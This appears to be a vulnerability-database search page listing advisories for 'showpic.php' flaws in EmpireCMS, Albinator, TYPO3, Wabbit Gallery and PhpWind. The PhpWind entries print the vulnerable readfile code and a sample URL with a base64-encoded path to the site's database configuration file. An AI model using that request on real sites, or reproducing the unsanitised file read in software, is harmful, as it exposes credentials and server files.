14 matches found
CVE-2018-6881
EmpireCMS 6.6 allows remote attackers to discover the full path via an array value for a parameter to admin/tool/ShowPic.php...
CVE-2018-6881
EmpireCMS 6.6 allows remote attackers to discover the full path via an array value for a parameter to admin/tool/ShowPic.php...
Albinator 2.0.8 showpic.php preloadSlideShow Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/17826/info Albinator is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code...
Typo3 3.5 b5 Showpic.PHP File Enumeration Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/6982/info TYPO3 is prone to a vulnerability that will allow remote attackers to enumerate whether or not files exist on the system hosting the software. This issue exists in the 'showpic.php' and 'thumbs.php' scripts. Thi...
PhpWind anti-hotlinking plug-in showpic.php local file read vulnerability - vulnerability warning - the black bar safety net
Vulnerability file: showpic.php $str=$_SERVER['QUERY_STRING']; $img=base64_decode($str); $codelen=strlen($safeguard); /* get the additional code length */ $img=substr($img,$codelen); /* remove the additional code */ readfile($img); The submitted parameter is base64-decoded and passed directly to readfile to read the file, so you...
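PhpWind anti-hotlinking plug-in Showpic.php local file read vulnerability
showpic.php $str=$_SERVER['QUERY_STRING']; $img=base64_decode($str); $codelen=strlen($safeguard); /* get the additional code length */ $img=substr($img,$codelen); /* remove the additional code */ readfile($img); The submitted parameter is base64-decoded and then passed directly to readfile to read the file, so a path can be base64-encoded and submitted to read out the file's contents PhpWind http://www.PhpWind.net http://bbs.xxx.com/showpic.php?ZGF0YS9zcWxfY29uZmlnLnBocA==...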
CVE-2007-2098
Multiple cross-site scripting (XSS) vulnerabilities in showpic.php in Wabbit PHP Gallery 0.9 allow remote attackers to inject arbitrary web script or HTML via the (1) pic and (2) gal parameters...
Wabbit PHP Gallery v0.9 Cross Site Scripting
Xmor$ Security Vulnerability Resear...
CVE-2006-2181
Multiple cross-site scripting (XSS) vulnerabilities in Albinator 2.0.8 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) cid parameter to dlisting.php or (2) preloadSlideShow parameter to showpic.php...
CVE-2006-2181
CVE-2006-2181: Multiple cross-site scripting (XSS) vulnerabilities affect Albinator 2.0.8 and earlier. The issues allow remote attackers to inject arbitrary web script or HTML via (1) the cid parameter in dlisting.php, and (2) the preloadSlideShow parameter in showpic.php. The description does no...
CVE-2006-2181
Multiple cross-site scripting (XSS) vulnerabilities in Albinator 2.0.8 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) cid parameter to dlisting.php or (2) preloadSlideShow parameter to showpic.php...
TYPO3 Security Bulletin
A Cross Site Scripting issue has been found in showpic.php. Component Type: Core Affected Components: showpic.php Versions: TYPO3 3.8.0 and earlier Vulnerability Type: Cross Site Scripting Severity: High Problem Description: A Cross Site Scripting issue has been found in showpic.php. Solution: Th...
Typo3 3.5 b5 - showpic.php File Enumeration
Typo3 3.5 b5 - showpic.php File Enumeration source: https://www.securityfocus.com/bid/6982/info TYPO3 is prone to a vulnerability that will allow remote attackers to enumerate whether or not files exist on the system hosting the software. This issue exists in the 'showpic.php' and 'thumbs.php'...
Typo3 3.5 b5 - 'showpic.php' File Enumeration
source: https://www.securityfocus.com/bid/6982/info TYPO3 is prone to a vulnerability that will allow remote attackers to enumerate whether or not files exist on the system hosting the software. This issue exists in the 'showpic.php' and 'thumbs.php' scripts. This type of information may be usefu...